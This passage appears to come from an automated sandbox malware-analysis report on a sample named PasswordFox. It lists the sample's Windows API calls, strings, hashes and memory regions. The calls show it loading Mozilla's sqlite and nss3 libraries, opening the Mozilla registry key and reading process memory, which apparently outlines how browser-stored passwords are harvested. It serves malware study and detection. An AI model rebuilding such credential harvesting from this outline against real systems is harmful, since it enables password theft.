                                        • Instruction ID: e8b0150b500b9fb94e561af83bb343bd3fc12ffd0ff5e4b3ea63fe4e96505450
                                        • Opcode Fuzzy Hash: e0a6fb643f5fe0e917eddc980f966602776b1e2d87de5879e0afff261d85d5fd
                                        • Instruction Fuzzy Hash: B6010CB13412006FE759DB38ED4BBAE7694E748354F04813EA606991F5EBFE45808B48
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,0040980B,00000000,?,00000000,0040F058,?), ref: 00404943
                                        • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 00404957
                                        • CloseHandle.KERNELBASE(00000000), ref: 00404960
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleTime
                                        • String ID:
                                        • API String ID: 3397143404-0
                                        • Opcode ID: 099d0484998da8a14ec28789afba2c9d87259674d141d9485c3d01d374ce5e64
                                        • Instruction ID: 298ecb40693a020ddc78f41bc06a78c83cbfe612b60dd1d70e3574b6aeb36a4e
                                        • Opcode Fuzzy Hash: 099d0484998da8a14ec28789afba2c9d87259674d141d9485c3d01d374ce5e64
                                        • Instruction Fuzzy Hash: EFE04F32201250F7E2311B76AD4CF4B2E7DEBC6B61F150638BA55F21E086304905C664
                                        APIs
                                        • malloc.MSVCRT ref: 004044FB
                                        • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004025D1,00000002,?,?,?,00401C46,?), ref: 00404513
                                        • free.MSVCRT ref: 0040451C
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: freemallocmemcpy
                                        • String ID:
                                        • API String ID: 3056473165-0
                                        • Opcode ID: 4eaa0b47f31daf78e94fe8ac6f8a088c94e0d5bc5a45c4b24aaaf9302ad6429d
                                        • Instruction ID: 434e3b53aff2dcbe856e5c5cb84ae4e4ed9f6ab48ee54a21ca6fa3f7400b0f26
                                        • Opcode Fuzzy Hash: 4eaa0b47f31daf78e94fe8ac6f8a088c94e0d5bc5a45c4b24aaaf9302ad6429d
                                        • Instruction Fuzzy Hash: 05F0E9B26042226FC708EA75BD8141BB39DEF84324B10483FF604E72D2D7389C40CBA8
                                        APIs
                                          • Part of subcall function 0040652D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040654F
                                          • Part of subcall function 0040652D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 004065E4
                                          • Part of subcall function 0040422F: CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,004075C9,?), ref: 00404241
                                        • CloseHandle.KERNELBASE(00000000), ref: 00407841
                                        • SetCursor.USER32 ref: 0040784D
                                          • Part of subcall function 00404AFC: WriteFile.KERNELBASE(?,?,00000000,00000000,00000000,?,?,00402151,?,?,00000000,?), ref: 00404B13
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$??2@??3@CloseCreateCursorHandleWrite
                                        • String ID:
                                        • API String ID: 2042149353-0
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: /stext
                                        • API String ID: 2081463915-3817206916
                                        APIs
                                        • VirtualProtect.KERNELBASE(?,00001000,00000004), ref: 004169BE
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        APIs
                                          • Part of subcall function 00409857: memset.MSVCRT ref: 0040989F
                                          • Part of subcall function 00409857: wcslen.MSVCRT ref: 004098B6
                                          • Part of subcall function 00409857: wcslen.MSVCRT ref: 004098BE
                                          • Part of subcall function 00409857: wcslen.MSVCRT ref: 00409917
                                          • Part of subcall function 00409857: wcslen.MSVCRT ref: 00409925
                                          • Part of subcall function 0040492B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,0040980B,00000000,?,00000000,0040F058,?), ref: 00404943
                                          • Part of subcall function 0040492B: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 00404957
                                          • Part of subcall function 0040492B: CloseHandle.KERNELBASE(00000000), ref: 00404960
                                        • CompareFileTime.KERNEL32(?,?,00000000,0040F058,?), ref: 00409815
                                        Similarity
                                        • API ID: wcslen$File$Time$CloseCompareCreateHandlememset
                                        • String ID:
                                        • API String ID: 4204647287-0
                                        APIs
                                        • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 0040A9B5
                                          • Part of subcall function 0040A89B: memset.MSVCRT ref: 0040A8BA
                                          • Part of subcall function 0040A89B: _itow.MSVCRT ref: 0040A8D1
                                          • Part of subcall function 0040A89B: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 0040A8E0
                                        Similarity
                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                        • String ID:
                                        • API String ID: 4232544981-0
                                        APIs
                                        • WriteFile.KERNELBASE(?,?,00000000,00000000,00000000,?,?,00402151,?,?,00000000,?), ref: 00404B13
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,004075C9,?), ref: 00404241
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        APIs
                                        • FindClose.KERNELBASE(?,00405139), ref: 0040522F
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        APIs
                                        • EnumResourceNamesW.KERNELBASE(?,?,Function_0000ABFC,00000000), ref: 0040AC91
                                        Similarity
                                        • API ID: EnumNamesResource
                                        • String ID:
                                        • API String ID: 3334572018-0
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(00000000,004034E5,00000000), ref: 00404534
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040358D,80000002,SOFTWARE\Mozilla,?), ref: 0040A9D2
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        APIs
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        APIs
                                        • memset.MSVCRT ref: 0040B27C
                                        • wcscpy.MSVCRT ref: 0040B293
                                        • memset.MSVCRT ref: 0040B2C6
                                        • wcscpy.MSVCRT ref: 0040B2DC
                                        • wcscat.MSVCRT ref: 0040B2ED
                                        • wcscpy.MSVCRT ref: 0040B313
                                        • wcscat.MSVCRT ref: 0040B324
                                        • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040B333
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040B34A
                                        • LoadLibraryW.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040B35D
                                        • LoadLibraryW.KERNEL32(mozsqlite3.dll,?,?,00000000), ref: 0040B36B
                                        • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040B387
                                        • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040B393
                                        • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040B3A0
                                        • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040B3AD
                                        • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040B3BA
                                        • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040B3C7
                                        • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040B3D4
                                        • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040B3E1
                                        • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040B3EE
                                        Strings
                                        Similarity
                                        • API ID: AddressProc$LibraryLoadwcscpy$memsetwcscat$HandleModule
                                        • String ID: \mozsqlite3.dll$\sqlite3.dll$mozsqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                        • API String ID: 2987540277-2598477893
                                        APIs
                                        • EmptyClipboard.USER32 ref: 004043D7
                                          • Part of subcall function 00404216: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,00403C73,?), ref: 00404228
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 004043F4
                                        • GlobalAlloc.KERNEL32(00002000,00000002), ref: 00404405
                                        • GlobalLock.KERNEL32(00000000), ref: 00404412
                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00404425
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00404437
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00404440
                                        • GetLastError.KERNEL32 ref: 00404448
                                        • CloseHandle.KERNEL32(?), ref: 00404454
                                        • GetLastError.KERNEL32 ref: 0040445F
                                        • CloseClipboard.USER32 ref: 00404468
                                        Similarity
                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                        • String ID:
                                        • API String ID: 3604893535-0
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,?,nss3.dll,00000000), ref: 00404D26
                                        • FindNextFileW.KERNEL32(00000000,?,?,nss3.dll,00000000), ref: 00404D45
                                        • FindClose.KERNEL32(00000000,?,nss3.dll,00000000), ref: 00404D65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNext
                                        • String ID: .$nss3.dll
                                        • API String ID: 3541575487-2628452245
                                        • Opcode ID: a0cdd73c55fa3cba713df79608e6cb38044a559a8bfbff6296494efd44007b3f
                                        • Instruction ID: 686c77c42c0bc2d4efecc617a5b38bdf54240a75ec4f3d98de153850bc1ea0c3
                                        • Opcode Fuzzy Hash: a0cdd73c55fa3cba713df79608e6cb38044a559a8bfbff6296494efd44007b3f
                                        • Instruction Fuzzy Hash: 24F09671900528DBDB306BB49C885EBB76CEF84365F004262AE16F3190D3389D45CA98
                                        APIs
                                        • GetDlgItem.USER32(?,000003EC), ref: 004010F7
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401109
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040113F
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040114C
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040117A
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040118C
                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401195
                                        • LoadCursorW.USER32(00000000,00000067), ref: 0040119E
                                        • SetCursor.USER32(00000000,?,?), ref: 004011A5
                                        • GetDlgItem.USER32(?,000003EE), ref: 004011C6
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004011D3
                                        • GetDlgItem.USER32(?,000003EC), ref: 004011ED
                                        • SetBkMode.GDI32(?,00000001), ref: 004011F9
                                        • SetTextColor.GDI32(?,00C00000), ref: 00401207
                                        • GetSysColorBrush.USER32(0000000F), ref: 0040120F
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401230
                                        • EndDialog.USER32(?,00000001), ref: 0040125B
                                        • DeleteObject.GDI32(?), ref: 00401267
                                        • GetDlgItem.USER32(?,000003ED), ref: 0040128C
                                        • ShowWindow.USER32(00000000), ref: 00401295
                                        • GetDlgItem.USER32(?,000003EE), ref: 004012A1
                                        • ShowWindow.USER32(00000000), ref: 004012A4
                                        • SetDlgItemTextW.USER32(?,000003EE,0040FEB0), ref: 004012B5
                                        • SetWindowTextW.USER32(?,PasswordFox), ref: 004012C3
                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004012DB
                                        • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004012EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                        • String ID: PasswordFox
                                        • API String ID: 829165378-3917124896
                                        • Opcode ID: b7105b33d1dbb3790eedd9d337f3acede5ab556a795471879666d2ecd75b0e8f
                                        • Instruction ID: 06ddacdadf490f56c435dab6f8e1940d296525f203817ed67ceea2118fbb07a8
                                        • Opcode Fuzzy Hash: b7105b33d1dbb3790eedd9d337f3acede5ab556a795471879666d2ecd75b0e8f
                                        • Instruction Fuzzy Hash: DA517D31500209EBDB21AF61DD84E6F7BA5EB44300F10863AF655BA5F1C779A991EB08
                                        APIs
                                        • EndDialog.USER32(?,?), ref: 00409B68
                                        • GetDlgItem.USER32(?,000003EA), ref: 00409B80
                                        • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00409B9E
                                        • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00409BAA
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00409BB2
                                        • memset.MSVCRT ref: 00409BD9
                                        • memset.MSVCRT ref: 00409BFB
                                        • memset.MSVCRT ref: 00409C14
                                        • memset.MSVCRT ref: 00409C28
                                        • memset.MSVCRT ref: 00409C42
                                        • memset.MSVCRT ref: 00409C57
                                        • GetCurrentProcess.KERNEL32 ref: 00409C5F
                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00409C82
                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00409CB4
                                        • memset.MSVCRT ref: 00409D07
                                        • GetCurrentProcessId.KERNEL32 ref: 00409D15
                                        • memcpy.MSVCRT(?,0040F850,0000021C), ref: 00409D43
                                        • wcscpy.MSVCRT ref: 00409D66
                                        • _snwprintf.MSVCRT ref: 00409DD5
                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 00409DED
                                        • GetDlgItem.USER32(?,000003EA), ref: 00409DF7
                                        • SetFocus.USER32(00000000), ref: 00409DFE
                                        Strings
                                        • {Unknown}, xrefs: 00409BED
                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00409DCA
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                        • API String ID: 4111938811-1819279800
                                        • Opcode ID: 9fe5e13d2a84a8293e436f1e929fd82f35361d293400db2b09c83656bd87a2bf
                                        • Instruction ID: f8f143b153c59337336e0c353dbabed249341f390da81bfa93234f36905f1053
                                        • Opcode Fuzzy Hash: 9fe5e13d2a84a8293e436f1e929fd82f35361d293400db2b09c83656bd87a2bf
                                        • Instruction Fuzzy Hash: 6A7175B2800219BEDB219F61DD45EDA376DEF08354F00417AF608B61A1DB799E848FA9
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 0040A4D9
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040A4E5
                                        • GetWindowRect.USER32(00000000,?), ref: 0040A527
                                        • GetWindowRect.USER32(?,?), ref: 0040A532
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A546
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A554
                                        • 73A1A570.USER32(?,?,?), ref: 0040A58D
                                        • wcslen.MSVCRT ref: 0040A5CD
                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0040A5DE
                                        • _snwprintf.MSVCRT ref: 0040A6EE
                                        • SetWindowTextW.USER32(?,?), ref: 0040A702
                                        • SetWindowTextW.USER32(?,00000000), ref: 0040A720
                                        • GetDlgItem.USER32(?,00000001), ref: 0040A756
                                        • GetWindowRect.USER32(00000000,?), ref: 0040A766
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A774
                                        • GetClientRect.USER32(?,?), ref: 0040A78B
                                        • GetWindowRect.USER32(?,?), ref: 0040A795
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040A7DB
                                        • GetClientRect.USER32(?,?), ref: 0040A7E5
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040A81D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$Rect$ItemPointsText$Client$A570ExtentPoint32_snwprintfwcslen
                                        • String ID: %s:$EDIT$STATIC
                                        • API String ID: 842022892-3046471546
                                        • Opcode ID: f55b858b5fc177468efb40cbe2bbab40b02d23b5efcb40a195741c8900b95891
                                        • Instruction ID: 3205e7fe72936d93a5ec92f6ef6244d36d3081a5468dab2d2e65200363bb81f1
                                        • Opcode Fuzzy Hash: f55b858b5fc177468efb40cbe2bbab40b02d23b5efcb40a195741c8900b95891
                                        • Instruction Fuzzy Hash: A7B1DF72108301AFD710DFA9C984E2ABBF9FF88304F004A2DF599962A1D775E954CF16
                                        APIs
                                          • Part of subcall function 004056C4: LoadMenuW.USER32(00000000), ref: 004056CC
                                        • SetMenu.USER32(?,00000000), ref: 0040847D
                                        • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 004084B0
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004084BF
                                        • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004084CC
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00408503
                                        • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 0040852A
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,00000001), ref: 004085A4
                                        • LoadIconW.USER32(00000000,00000066), ref: 004085AD
                                        • SetFocus.USER32(?,/nosaveload), ref: 0040860B
                                        • GetFileAttributesW.KERNEL32(00410408), ref: 00408625
                                        • GetTempPathW.KERNEL32(00000104,00410408), ref: 00408635
                                        • wcslen.MSVCRT ref: 0040863C
                                        • wcslen.MSVCRT ref: 0040864A
                                        • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 00408697
                                        • SendMessageW.USER32(?,00000404,00000002,?), ref: 004086D2
                                        • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004086E5
                                          • Part of subcall function 004026DE: wcslen.MSVCRT ref: 004026FB
                                          • Part of subcall function 004026DE: SendMessageW.USER32(00000000,00001061,00000000,?), ref: 0040271F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessageSend$HandleLoadModulewcslen$Menu$AttributesClipboardCreateFileFocusFormatIconImagePathRegisterTempWindow
                                        • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
                                        • API String ID: 3682063973-2103577948
                                        • Opcode ID: 2f1baa7290e0e506af1a895a6cc2592183571aeea87fd9672bedcc72a81e6651
                                        • Instruction ID: 5775a152888729de56b34ef4f4b2d27c24110eed3a33eee853d19f4e7ffcdba8
                                        • Opcode Fuzzy Hash: 2f1baa7290e0e506af1a895a6cc2592183571aeea87fd9672bedcc72a81e6651
                                        • Instruction Fuzzy Hash: 07B1CB71500288EFEB11DF68CC89BCA7FA5AF64304F040579FA48BB2D2C7B59548CB69
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wcscat$_snwprintfmemset$wcscpy
                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                        • API String ID: 3143752011-1996832678
                                        • Opcode ID: 318a56d019d3aaa7f96921b2e4e0ce1dd904295b8dddfdd2e3368ec152fa45fb
                                        • Instruction ID: d7b2c1fe3ac28435f262e00ba4c0655e1632008321094755c7529686555df315
                                        • Opcode Fuzzy Hash: 318a56d019d3aaa7f96921b2e4e0ce1dd904295b8dddfdd2e3368ec152fa45fb
                                        • Instruction Fuzzy Hash: CC3181B2900309AAD720ABA59C86D7B73BCDB44714F50817FF224B21C3E77C9A459A9D
                                        APIs
                                        • memset.MSVCRT ref: 00407065
                                        • memset.MSVCRT ref: 0040708F
                                        • memset.MSVCRT ref: 004070A5
                                        • memset.MSVCRT ref: 004070BB
                                        • _snwprintf.MSVCRT ref: 004070F4
                                        • wcscpy.MSVCRT ref: 0040713F
                                        • _snwprintf.MSVCRT ref: 004071CC
                                        • wcscat.MSVCRT ref: 004071FE
                                          • Part of subcall function 0040AEB5: _snwprintf.MSVCRT ref: 0040AED9
                                        • wcscpy.MSVCRT ref: 004071E0
                                        • _snwprintf.MSVCRT ref: 0040723D
                                          • Part of subcall function 00404248: wcslen.MSVCRT ref: 00404255
                                          • Part of subcall function 00404248: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00407299,?,<item>), ref: 00404264
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _snwprintfmemset$wcscpy$FileWritewcscatwcslen
                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                        • API String ID: 1277802453-601624466
                                        • Opcode ID: f8dacbfd05d566ad0207a67edbf8d3d069a65d3e3b5223f6146df0e46472cafa
                                        • Instruction ID: d2132ec82104963cb5620df9263e511b897797033fbb75d2efbdcd343e46ae46
                                        • Opcode Fuzzy Hash: f8dacbfd05d566ad0207a67edbf8d3d069a65d3e3b5223f6146df0e46472cafa
                                        • Instruction Fuzzy Hash: A061AD31900208EFDF14AF54CC86EAE7B79EF44314F1041AAF905BA2D2DB34AE51CB99
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
